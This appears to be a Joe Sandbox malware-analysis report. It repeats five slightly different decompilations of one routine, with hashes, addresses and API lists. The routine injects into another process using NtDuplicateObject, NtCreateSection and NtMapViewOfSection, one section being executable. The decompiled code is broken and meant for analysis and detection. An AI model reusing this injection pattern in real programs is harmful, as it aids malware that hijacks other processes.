Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 94fb41d671dbeab80d9278360f7b723801272b6da464276eb8e79f9657775aa6
Instruction ID: 4afb5ad6e9f78dbb0f0fc4dd380045413720c66cee1019041566b0107d6eeca4
Opcode Fuzzy Hash: 94fb41d671dbeab80d9278360f7b723801272b6da464276eb8e79f9657775aa6
Instruction Fuzzy Hash: 2F615E71900208FBEB209F91CC49FAF7BB8EF85B14F10412AF912BA1E5D6749901DB66

Uniqueness

Uniqueness Score: -1.00%

Function 00401564 Relevance: 10.7, APIs: 7, Instructions: 175
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E00401564(void* __eax, void* __edx, void* __esi) {
				intOrPtr _t89;
				struct _EXCEPTION_RECORD _t92;
				intOrPtr _t93;
				struct _GUID _t99;
				struct _GUID _t101;
				long _t102;
				PVOID* _t123;
				PVOID* _t125;
				intOrPtr _t129;
				struct _EXCEPTION_RECORD* _t135;
				void* _t179;
				struct _EXCEPTION_RECORD _t180;
				struct _EXCEPTION_RECORD* _t190;
				intOrPtr* _t192;
				HANDLE* _t193;
				HANDLE* _t194;
				void* _t207;
				void* _t208;
				void* _t210;
				intOrPtr* _t211;
				void* _t216;

				_t216 = __eax + 0x15a4b8;
				_push(0x387);
				_t211 = _t210 + 4;
				_push(0x83);
				L004011F5(_t179, _t216);
				_t129 =  *((intOrPtr*)(_t208 + 8));
				_t180 = 0;
				 *((intOrPtr*)(_t208 - 0x34)) = 0;
				if(gs != 0) {
					 *((intOrPtr*)(_t208 - 0x34)) =  *((intOrPtr*)(_t208 - 0x34)) + 1;
				}
				while(1) {
					_t89 =  *((intOrPtr*)(_t129 + 0x48))();
					if(_t89 != 0) {
						break;
					}
					 *((intOrPtr*)(_t129 + 0x1c))(0x3e8);
				}
				 *((intOrPtr*)(_t208 - 0x5c)) = _t89;
				_t190 = _t208 - 0x60;
				 *_t190 = _t180;
				 *((intOrPtr*)(_t129 + 0x4c))(_t89, _t190);
				_t92 =  *_t190;
				if(_t92 != 0) {
					_t135 = _t208 - 0x30;
					 *_t135 = _t92;
					 *(_t135 + 4) = _t180;
					_t192 = _t208 - 0x28;
					 *((intOrPtr*)(_t129 + 0x10))(_t192, 0x18);
					 *_t192 = 0x18;
					_push(_t208 - 0x30);
					_push(_t192);
					_push(0x40);
					_push(_t208 - 0x10);
					if( *((intOrPtr*)(_t129 + 0x70))() == 0 && NtDuplicateObject( *(_t208 - 0x10), 0xffffffff, 0xffffffff, _t208 - 0xc, _t180, _t180, 2) == 0) {
						 *(_t208 - 8) = _t180;
						_t99 = _t208 - 0x50;
						 *(_t99 + 4) = _t180;
						 *_t99 = 0x5000;
						_t193 = _t208 - 0x54;
						if(NtCreateSection(_t193, 6, _t180, _t99, 4, 0x8000000, _t180) == 0) {
							 *_t25 =  *(_t208 - 0x50);
							_t123 = _t208 - 0x44;
							 *_t123 = _t180;
							if(NtMapViewOfSection( *_t193, 0xffffffff, _t123, _t180, _t180, _t180, _t208 - 0x38, 1, _t180, 4) == 0) {
								_t125 = _t208 - 0x3c;
								 *_t125 = _t180;
								if(NtMapViewOfSection( *_t193,  *(_t208 - 0xc), _t125, _t180, _t180, _t180, _t208 - 0x38, 1, _t180, 4) == 0) {
									_t207 =  *(_t208 - 0x44);
									 *((intOrPtr*)(_t129 + 0x20))(_t180, _t207, 0x104);
									 *((intOrPtr*)(_t207 + 0x208)) =  *((intOrPtr*)(_t208 + 0x14));
									 *(_t208 - 8) =  *(_t208 - 8) + 1;
								}
							}
						}
						_t101 = _t208 - 0x50;
						 *(_t101 + 4) = _t180;
						 *_t101 =  *((intOrPtr*)(_t208 + 0x10)) + 0x10000;
						_t194 = _t208 - 0x58;
						_t102 = NtCreateSection(_t194, 0xe, _t180, _t101, 0x40, 0x8000000, _t180);
						if (_t102 != 0) goto L66;
						 *_t102 =  *_t102 + _t102;
					}
				}
				_push(0x15a4);
				_t93 =  *_t211;
				_push(0x83);
				L004011F5(_t180, _t237);
				return _t93;
			}

0x00401566
0x00401578
0x00401580
0x00401592
0x0040159f
0x004015a4
0x004015a7
0x004015a9
0x004015b2
0x004015b4
0x004015b4
0x004015b7
0x004015b7
0x004015bc
0x00000000
0x00000000
0x004018dc
0x004018dc
0x004015c2
0x004015c5
0x004015c8
0x004015cc
0x004015cf
0x004015d3
0x004015d9
0x004015dc
0x004015de
0x004015e1
0x004015e7
0x004015ea
0x004015f8
0x004015f9
0x004015fa
0x004015fc
0x00401602
0x00401625
0x00401628
0x0040162b
0x0040162e
0x00401634
0x00401649
0x0040164e
0x00401651
0x00401654
0x0040166c
0x0040166e
0x00401671
0x0040168a
0x0040168c
0x00401696
0x0040169c
0x004016a2
0x004016a2
0x0040168a
0x0040166c
0x004016a5
0x004016b1
0x004016b4
0x004016b6
0x004016c6
0x004016cb
0x004016cf
0x004016cf
0x00401602
0x004018ea
0x004018ef
0x00401914
0x00401926
0x0040192f

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719

Memory Dump Source

Source File: 00000000.00000002.396904398.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 25fb98b4f42f8453298f183ae8c9fe853ab2af685c4accb6617153fec11399dc
Instruction ID: 3c61d4fa49215657d74707620d36eaa57d50516e3f831c539a14d6838cb40392
Opcode Fuzzy Hash: 25fb98b4f42f8453298f183ae8c9fe853ab2af685c4accb6617153fec11399dc
Instruction Fuzzy Hash: 23513CB1900249FBEB209F91CC49FAF7BB8EF85710F14412AF911BA1E5D6749941CB24

Uniqueness

Uniqueness Score: -1.00%

Function 00401577 Relevance: 10.7, APIs: 7, Instructions: 168
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 81%

			E00401577() {
				intOrPtr _t86;
				struct _EXCEPTION_RECORD _t89;
				intOrPtr _t90;
				struct _GUID _t96;
				struct _GUID _t98;
				long _t99;
				PVOID* _t120;
				PVOID* _t122;
				intOrPtr _t126;
				struct _EXCEPTION_RECORD* _t132;
				void* _t175;
				struct _EXCEPTION_RECORD _t176;
				struct _EXCEPTION_RECORD* _t184;
				intOrPtr* _t186;
				HANDLE* _t187;
				HANDLE* _t188;
				void* _t201;
				void* _t202;
				void* _t204;
				intOrPtr* _t205;
				void* _t210;

				asm("repe push 0x387");
				_push(0x387);
				_t205 = _t204 + 4;
				_push(0x83);
				L004011F5(_t175, _t210);
				_t126 =  *((intOrPtr*)(_t202 + 8));
				_t176 = 0;
				 *((intOrPtr*)(_t202 - 0x34)) = 0;
				if(gs != 0) {
					 *((intOrPtr*)(_t202 - 0x34)) =  *((intOrPtr*)(_t202 - 0x34)) + 1;
				}
				while(1) {
					_t86 =  *((intOrPtr*)(_t126 + 0x48))();
					if(_t86 != 0) {
						break;
					}
					 *((intOrPtr*)(_t126 + 0x1c))(0x3e8);
				}
				 *((intOrPtr*)(_t202 - 0x5c)) = _t86;
				_t184 = _t202 - 0x60;
				 *_t184 = _t176;
				 *((intOrPtr*)(_t126 + 0x4c))(_t86, _t184);
				_t89 =  *_t184;
				if(_t89 != 0) {
					_t132 = _t202 - 0x30;
					 *_t132 = _t89;
					 *(_t132 + 4) = _t176;
					_t186 = _t202 - 0x28;
					 *((intOrPtr*)(_t126 + 0x10))(_t186, 0x18);
					 *_t186 = 0x18;
					_push(_t202 - 0x30);
					_push(_t186);
					_push(0x40);
					_push(_t202 - 0x10);
					if( *((intOrPtr*)(_t126 + 0x70))() == 0 && NtDuplicateObject( *(_t202 - 0x10), 0xffffffff, 0xffffffff, _t202 - 0xc, _t176, _t176, 2) == 0) {
						 *(_t202 - 8) = _t176;
						_t96 = _t202 - 0x50;
						 *(_t96 + 4) = _t176;
						 *_t96 = 0x5000;
						_t187 = _t202 - 0x54;
						if(NtCreateSection(_t187, 6, _t176, _t96, 4, 0x8000000, _t176) == 0) {
							 *_t25 =  *(_t202 - 0x50);
							_t120 = _t202 - 0x44;
							 *_t120 = _t176;
							if(NtMapViewOfSection( *_t187, 0xffffffff, _t120, _t176, _t176, _t176, _t202 - 0x38, 1, _t176, 4) == 0) {
								_t122 = _t202 - 0x3c;
								 *_t122 = _t176;
								if(NtMapViewOfSection( *_t187,  *(_t202 - 0xc), _t122, _t176, _t176, _t176, _t202 - 0x38, 1, _t176, 4) == 0) {
									_t201 =  *(_t202 - 0x44);
									 *((intOrPtr*)(_t126 + 0x20))(_t176, _t201, 0x104);
									 *((intOrPtr*)(_t201 + 0x208)) =  *((intOrPtr*)(_t202 + 0x14));
									 *(_t202 - 8) =  *(_t202 - 8) + 1;
								}
							}
						}
						_t98 = _t202 - 0x50;
						 *(_t98 + 4) = _t176;
						 *_t98 =  *((intOrPtr*)(_t202 + 0x10)) + 0x10000;
						_t188 = _t202 - 0x58;
						_t99 = NtCreateSection(_t188, 0xe, _t176, _t98, 0x40, 0x8000000, _t176);
						if (_t99 != 0) goto L63;
						 *_t99 =  *_t99 + _t99;
					}
				}
				_push(0x15a4);
				_t90 =  *_t205;
				_push(0x83);
				L004011F5(_t176, _t231);
				return _t90;
			}

0x00401577
0x00401578
0x00401580
0x00401592
0x0040159f
0x004015a4
0x004015a7
0x004015a9
0x004015b2
0x004015b4
0x004015b4
0x004015b7
0x004015b7
0x004015bc
0x00000000
0x00000000
0x004018dc
0x004018dc
0x004015c2
0x004015c5
0x004015c8
0x004015cc
0x004015cf
0x004015d3
0x004015d9
0x004015dc
0x004015de
0x004015e1
0x004015e7
0x004015ea
0x004015f8
0x004015f9
0x004015fa
0x004015fc
0x00401602
0x00401625
0x00401628
0x0040162b
0x0040162e
0x00401634
0x00401649
0x0040164e
0x00401651
0x00401654
0x0040166c
0x0040166e
0x00401671
0x0040168a
0x0040168c
0x00401696
0x0040169c
0x004016a2
0x004016a2
0x0040168a
0x0040166c
0x004016a5
0x004016b1
0x004016b4
0x004016b6
0x004016c6
0x004016cb
0x004016cf
0x004016cf
0x00401602
0x004018ea
0x004018ef
0x00401914
0x00401926
0x0040192f

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719

Memory Dump Source

Source File: 00000000.00000002.396904398.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 083574d86fbacfeeee5c63ee9eae41342103da8b89c03bac49e39559cf037064
Instruction ID: ba3189e89dbc592d8eefb072767128172b6b3105eb2a85c49d1307986ab5c8dd
Opcode Fuzzy Hash: 083574d86fbacfeeee5c63ee9eae41342103da8b89c03bac49e39559cf037064
Instruction Fuzzy Hash: 9D511B71900249BFEB209F91CC48FAF7BB8FF85B14F10412AFA11BA1E5D6749941CB24

Uniqueness

Uniqueness Score: -1.00%

Function 00401523 Relevance: 10.7, APIs: 7, Instructions: 168
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 87%

			E00401523(void* __eax, void* __esi, void* __eflags) {
				long _t89;
				long _t92;
				intOrPtr _t93;
				struct _GUID _t99;
				long _t100;
				struct _GUID _t101;
				long _t102;
				PVOID* _t123;
				long _t124;
				PVOID* _t125;
				long _t126;
				intOrPtr _t129;
				long* _t134;
				void* _t176;
				struct _EXCEPTION_RECORD _t177;
				struct _EXCEPTION_RECORD* _t187;
				intOrPtr* _t189;
				HANDLE* _t190;
				HANDLE* _t191;
				void* _t204;
				void* _t205;
				intOrPtr* _t207;

				asm("outsd");
				asm("out 0x70, al");
				if(__eflags > 0) {
					L004011F5(_t176, __eflags);
					_t129 =  *((intOrPtr*)(_t205 + 8));
					_t177 = 0;
					 *(_t205 - 0x34) = 0;
					__eflags = gs;
					if(gs != 0) {
						_t4 = _t205 - 0x34;
						 *_t4 =  *(_t205 - 0x34) + 1;
						__eflags =  *_t4;
					}
					while(1) {
						_t89 =  *((intOrPtr*)(_t129 + 0x48))();
						__eflags = _t89;
						if(_t89 != 0) {
							break;
						}
						 *((intOrPtr*)(_t129 + 0x1c))(0x3e8);
					}
					 *(_t205 - 0x5c) = _t89;
					_t187 = _t205 - 0x60;
					 *_t187 = _t177;
					 *((intOrPtr*)(_t129 + 0x4c))(_t89, _t187);
					_t92 =  *_t187;
					__eflags = _t92;
					if(__eflags != 0) {
						_t134 = _t205 - 0x30;
						 *_t134 = _t92;
						_t134[1] = _t177;
						_t189 = _t205 - 0x28;
						 *((intOrPtr*)(_t129 + 0x10))(_t189, 0x18);
						 *_t189 = 0x18;
						__eflags =  *((intOrPtr*)(_t129 + 0x70))(_t205 - 0x10, 0x40, _t189, _t205 - 0x30);
						if(__eflags == 0) {
							__eflags = NtDuplicateObject( *(_t205 - 0x10), 0xffffffff, 0xffffffff, _t205 - 0xc, _t177, _t177, 2);
							if(__eflags == 0) {
								 *(_t205 - 8) = _t177;
								_t99 = _t205 - 0x50;
								 *(_t99 + 4) = _t177;
								 *_t99 = 0x5000;
								_t190 = _t205 - 0x54;
								_t100 = NtCreateSection(_t190, 6, _t177, _t99, 4, 0x8000000, _t177);
								__eflags = _t100;
								if(_t100 == 0) {
									 *_t26 =  *(_t205 - 0x50);
									_t123 = _t205 - 0x44;
									 *_t123 = _t177;
									_t124 = NtMapViewOfSection( *_t190, 0xffffffff, _t123, _t177, _t177, _t177, _t205 - 0x38, 1, _t177, 4);
									__eflags = _t124;
									if(_t124 == 0) {
										_t125 = _t205 - 0x3c;
										 *_t125 = _t177;
										_t126 = NtMapViewOfSection( *_t190,  *(_t205 - 0xc), _t125, _t177, _t177, _t177, _t205 - 0x38, 1, _t177, 4);
										__eflags = _t126;
										if(_t126 == 0) {
											_t204 =  *(_t205 - 0x44);
											 *((intOrPtr*)(_t129 + 0x20))(_t177, _t204, 0x104);
											 *((intOrPtr*)(_t204 + 0x208)) =  *((intOrPtr*)(_t205 + 0x14));
											_t38 = _t205 - 8;
											 *_t38 =  *(_t205 - 8) + 1;
											__eflags =  *_t38;
										}
									}
								}
								_t101 = _t205 - 0x50;
								 *(_t101 + 4) = _t177;
								 *_t101 =  *((intOrPtr*)(_t205 + 0x10)) + 0x10000;
								_t191 = _t205 - 0x58;
								_t102 = NtCreateSection(_t191, 0xe, _t177, _t101, 0x40, 0x8000000, _t177);
								__eflags = _t102;
								if (_t102 != 0) goto L60;
								 *_t102 =  *_t102 + _t102;
								__eflags =  *_t102;
							}
						}
					}
					_push(0x15a4);
					_t93 =  *_t207;
					_push(0x83);
					L004011F5(_t177, __eflags);
					return _t93;
				} else {
					asm("popfd");
					asm("repe add al, 0x9b");
					asm("wait");
					asm("wait");
					return __esi;
				}
			}

0x00401523
0x00401524
0x00401527
0x0040159f
0x004015a4
0x004015a7
0x004015a9
0x004015af
0x004015b2
0x004015b4
0x004015b4
0x004015b4
0x004015b4
0x004015b7
0x004015b7
0x004015ba
0x004015bc
0x00000000
0x00000000
0x004018dc
0x004018dc
0x004015c2
0x004015c5
0x004015c8
0x004015cc
0x004015cf
0x004015d1
0x004015d3
0x004015d9
0x004015dc
0x004015de
0x004015e1
0x004015e7
0x004015ea
0x00401600
0x00401602
0x0040161d
0x0040161f
0x00401625
0x00401628
0x0040162b
0x0040162e
0x00401634
0x00401644
0x00401647
0x00401649
0x0040164e
0x00401651
0x00401654
0x00401667
0x0040166a
0x0040166c
0x0040166e
0x00401671
0x00401685
0x00401688
0x0040168a
0x0040168c
0x00401696
0x0040169c
0x004016a2
0x004016a2
0x004016a2
0x004016a2
0x0040168a
0x0040166c
0x004016a5
0x004016b1
0x004016b4
0x004016b6
0x004016c6
0x004016c9
0x004016cb
0x004016cf
0x004016cf
0x004016cf
0x0040161f
0x00401602
0x004018ea
0x004018ef
0x00401914
0x00401926
0x0040192f
0x00401529
0x00401529
0x0040152a
0x0040152d
0x0040152e
0x0040152f
0x0040152f

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685

Memory Dump Source

Source File: 00000000.00000002.396904398.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Section$View$CreateDuplicateObject
String ID:
API String ID: 3617974760-0
Opcode ID: f2a4be680cfb18686692e1608cce56726be6b364057ceed8b4cf4ca6dcfe5132
Instruction ID: c9dca56e4daa214b2bd9150ebf0f157daf6c833c296841cdcd3f7df5e4c146b1
Opcode Fuzzy Hash: f2a4be680cfb18686692e1608cce56726be6b364057ceed8b4cf4ca6dcfe5132
Instruction Fuzzy Hash: 91510A71900249BFEB209F92CC48F9FBBB8FF85B14F14411AFA11BA2A5D7749945CB24

Uniqueness

Uniqueness Score: -1.00%

Function 0040158C Relevance: 10.7, APIs: 7, Instructions: 168
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E0040158C(void* __eax, void* __edi) {
				void* _t89;
				intOrPtr _t91;
				struct _EXCEPTION_RECORD _t94;
				intOrPtr _t95;
				struct _GUID _t101;
				struct _GUID _t103;
				long _t104;
				PVOID* _t125;
				PVOID* _t127;
				intOrPtr _t131;
				struct _EXCEPTION_RECORD* _t136;
				void* _t180;
				struct _EXCEPTION_RECORD _t181;
				struct _EXCEPTION_RECORD* _t189;
				intOrPtr* _t191;
				HANDLE* _t192;
				HANDLE* _t193;
				void* _t206;
				void* _t207;
				void* _t208;
				void* _t210;
				intOrPtr* _t211;
				intOrPtr _t216;

				_t211 = _t210 + 1;
				asm("clc");
				asm("stc");
				_t89 = _t207;
				_t208 = __eax;
				_t180 = __edi - 1;
				_t2 = _t89 - 0x7d;
				 *_t2 =  *((intOrPtr*)(_t89 - 0x7d));
				_t216 =  *_t2;
				_push(0x83);
				L004011F5(_t180, _t216);
				_t131 =  *((intOrPtr*)(__eax + 8));
				_t181 = 0;
				 *((intOrPtr*)(__eax - 0x34)) = 0;
				if(gs != 0) {
					 *((intOrPtr*)(__eax - 0x34)) =  *((intOrPtr*)(__eax - 0x34)) + 1;
				}
				while(1) {
					_t91 =  *((intOrPtr*)(_t131 + 0x48))();
					if(_t91 != 0) {
						break;
					}
					 *((intOrPtr*)(_t131 + 0x1c))(0x3e8);
				}
				 *((intOrPtr*)(_t208 - 0x5c)) = _t91;
				_t189 = _t208 - 0x60;
				 *_t189 = _t181;
				 *((intOrPtr*)(_t131 + 0x4c))(_t91, _t189);
				_t94 =  *_t189;
				if(_t94 != 0) {
					_t136 = _t208 - 0x30;
					 *_t136 = _t94;
					 *(_t136 + 4) = _t181;
					_t191 = _t208 - 0x28;
					 *((intOrPtr*)(_t131 + 0x10))(_t191, 0x18);
					 *_t191 = 0x18;
					_push(_t208 - 0x30);
					_push(_t191);
					_push(0x40);
					_push(_t208 - 0x10);
					if( *((intOrPtr*)(_t131 + 0x70))() == 0 && NtDuplicateObject( *(_t208 - 0x10), 0xffffffff, 0xffffffff, _t208 - 0xc, _t181, _t181, 2) == 0) {
						 *(_t208 - 8) = _t181;
						_t101 = _t208 - 0x50;
						 *(_t101 + 4) = _t181;
						 *_t101 = 0x5000;
						_t192 = _t208 - 0x54;
						if(NtCreateSection(_t192, 6, _t181, _t101, 4, 0x8000000, _t181) == 0) {
							 *_t28 =  *(_t208 - 0x50);
							_t125 = _t208 - 0x44;
							 *_t125 = _t181;
							if(NtMapViewOfSection( *_t192, 0xffffffff, _t125, _t181, _t181, _t181, _t208 - 0x38, 1, _t181, 4) == 0) {
								_t127 = _t208 - 0x3c;
								 *_t127 = _t181;
								if(NtMapViewOfSection( *_t192,  *(_t208 - 0xc), _t127, _t181, _t181, _t181, _t208 - 0x38, 1, _t181, 4) == 0) {
									_t206 =  *(_t208 - 0x44);
									 *((intOrPtr*)(_t131 + 0x20))(_t181, _t206, 0x104);
									 *((intOrPtr*)(_t206 + 0x208)) =  *((intOrPtr*)(_t208 + 0x14));
									 *(_t208 - 8) =  *(_t208 - 8) + 1;
								}
							}
						}
						_t103 = _t208 - 0x50;
						 *(_t103 + 4) = _t181;
						 *_t103 =  *((intOrPtr*)(_t208 + 0x10)) + 0x10000;
						_t193 = _t208 - 0x58;
						_t104 = NtCreateSection(_t193, 0xe, _t181, _t103, 0x40, 0x8000000, _t181);
						if (_t104 != 0) goto L60;
						 *_t104 =  *_t104 + _t104;
					}
				}
				_push(0x15a4);
				_t95 =  *_t211;
				_push(0x83);
				L004011F5(_t181, _t237);
				return _t95;
			}

0x0040158c
0x0040158d
0x0040158e
0x0040158f
0x0040158f
0x00401590
0x00401591
0x00401591
0x00401591
0x00401592
0x0040159f
0x004015a4
0x004015a7
0x004015a9
0x004015b2
0x004015b4
0x004015b4
0x004015b7
0x004015b7
0x004015bc
0x00000000
0x00000000
0x004018dc
0x004018dc
0x004015c2
0x004015c5
0x004015c8
0x004015cc
0x004015cf
0x004015d3
0x004015d9
0x004015dc
0x004015de
0x004015e1
0x004015e7
0x004015ea
0x004015f8
0x004015f9
0x004015fa
0x004015fc
0x00401602
0x00401625
0x00401628
0x0040162b
0x0040162e
0x00401634
0x00401649
0x0040164e
0x00401651
0x00401654
0x0040166c
0x0040166e
0x00401671
0x0040168a
0x0040168c
0x00401696
0x0040169c
0x004016a2
0x004016a2
0x0040168a
0x0040166c
0x004016a5
0x004016b1
0x004016b4
0x004016b6
0x004016c6
0x004016cb
0x004016cf
0x004016cf
0x00401602
0x004018ea
0x004018ef
0x00401914
0x00401926
0x0040192f

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719

Memory Dump Source

Source File: 00000000.00000002.396904398.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: c7db028f8420b358ec692813db1bfb5c9bff11339c6e47bbd5ed771e3bdbe30c
Instruction ID: 02d2e3ac3767ea31e924919402f7a0ff100aaf9667a8aefd77e34752db93229b
Opcode Fuzzy Hash: c7db028f8420b358ec692813db1bfb5c9bff11339c6e47bbd5ed771e3bdbe30c
Instruction Fuzzy Hash: C9513AB1900249BFEB209F92CC48F9FBBB8FF85B14F10415AFA11AA1E5D7749944CB20

Uniqueness

Uniqueness Score: -1.00%

Function 00401585 Relevance: 10.7, APIs: 7, Instructions: 165
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E00401585() {
				intOrPtr _t86;
				struct _EXCEPTION_RECORD _t89;
				intOrPtr _t90;
				struct _GUID _t96;
				struct _GUID _t98;
				long _t99;
				PVOID* _t120;
				PVOID* _t122;
				intOrPtr _t126;
				struct _EXCEPTION_RECORD* _t132;
				void* _t175;
				struct _EXCEPTION_RECORD _t176;
				struct _EXCEPTION_RECORD* _t185;
				intOrPtr* _t187;
				HANDLE* _t188;
				HANDLE* _t189;
				void* _t202;
				void* _t203;
				void* _t205;
				intOrPtr* _t206;
				void* _t211;

				_push(0x387);
				_t206 = _t205 + 4;
				_push(0x83);
				L004011F5(_t175, _t211);
				_t126 =  *((intOrPtr*)(_t203 + 8));
				_t176 = 0;
				 *((intOrPtr*)(_t203 - 0x34)) = 0;
				if(gs != 0) {
					 *((intOrPtr*)(_t203 - 0x34)) =  *((intOrPtr*)(_t203 - 0x34)) + 1;
				}
				while(1) {
					_t86 =  *((intOrPtr*)(_t126 + 0x48))();
					if(_t86 != 0) {
						break;
					}
					 *((intOrPtr*)(_t126 + 0x1c))(0x3e8);
				}
				 *((intOrPtr*)(_t203 - 0x5c)) = _t86;
				_t185 = _t203 - 0x60;
				 *_t185 = _t176;
				 *((intOrPtr*)(_t126 + 0x4c))(_t86, _t185);
				_t89 =  *_t185;
				if(_t89 != 0) {
					_t132 = _t203 - 0x30;
					 *_t132 = _t89;
					 *(_t132 + 4) = _t176;
					_t187 = _t203 - 0x28;
					 *((intOrPtr*)(_t126 + 0x10))(_t187, 0x18);
					 *_t187 = 0x18;
					_push(_t203 - 0x30);
					_push(_t187);
					_push(0x40);
					_push(_t203 - 0x10);
					if( *((intOrPtr*)(_t126 + 0x70))() == 0 && NtDuplicateObject( *(_t203 - 0x10), 0xffffffff, 0xffffffff, _t203 - 0xc, _t176, _t176, 2) == 0) {
						 *(_t203 - 8) = _t176;
						_t96 = _t203 - 0x50;
						 *(_t96 + 4) = _t176;
						 *_t96 = 0x5000;
						_t188 = _t203 - 0x54;
						if(NtCreateSection(_t188, 6, _t176, _t96, 4, 0x8000000, _t176) == 0) {
							 *_t25 =  *(_t203 - 0x50);
							_t120 = _t203 - 0x44;
							 *_t120 = _t176;
							if(NtMapViewOfSection( *_t188, 0xffffffff, _t120, _t176, _t176, _t176, _t203 - 0x38, 1, _t176, 4) == 0) {
								_t122 = _t203 - 0x3c;
								 *_t122 = _t176;
								if(NtMapViewOfSection( *_t188,  *(_t203 - 0xc), _t122, _t176, _t176, _t176, _t203 - 0x38, 1, _t176, 4) == 0) {
									_t202 =  *(_t203 - 0x44);
									 *((intOrPtr*)(_t126 + 0x20))(_t176, _t202, 0x104);
									 *((intOrPtr*)(_t202 + 0x208)) =  *((intOrPtr*)(_t203 + 0x14));
									 *(_t203 - 8) =  *(_t203 - 8) + 1;
								}
							}
						}
						_t98 = _t203 - 0x50;
						 *(_t98 + 4) = _t176;
						 *_t98 =  *((intOrPtr*)(_t203 + 0x10)) + 0x10000;
						_t189 = _t203 - 0x58;
						_t99 = NtCreateSection(_t189, 0xe, _t176, _t98, 0x40, 0x8000000, _t176);
						if (_t99 != 0) goto L64;
						 *_t99 =  *_t99 + _t99;
					}
				}
				_push(0x15a4);
				_t90 =  *_t206;
				_push(0x83);
				L004011F5(_t176, _t232);
				return _t90;
			}

0x00401578
0x00401580
0x00401592
0x0040159f
0x004015a4
0x004015a7
0x004015a9
0x004015b2
0x004015b4
0x004015b4
0x004015b7
0x004015b7
0x004015bc
0x00000000
0x00000000
0x004018dc
0x004018dc
0x004015c2
0x004015c5
0x004015c8
0x004015cc
0x004015cf
0x004015d3
0x004015d9
0x004015dc
0x004015de
0x004015e1
0x004015e7
0x004015ea
0x004015f8
0x004015f9
0x004015fa
0x004015fc
0x00401602
0x00401625
0x00401628
0x0040162b
0x0040162e
0x00401634
0x00401649
0x0040164e
0x00401651
0x00401654
0x0040166c
0x0040166e
0x00401671
0x0040168a
0x0040168c
0x00401696
0x0040169c
0x004016a2
0x004016a2
0x0040168a
0x0040166c
0x004016a5
0x004016b1
0x004016b4
0x004016b6
0x004016c6
0x004016cb
0x004016cf
0x004016cf
0x00401602
0x004018ea
0x004018ef
0x00401914
0x00401926
0x0040192f

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
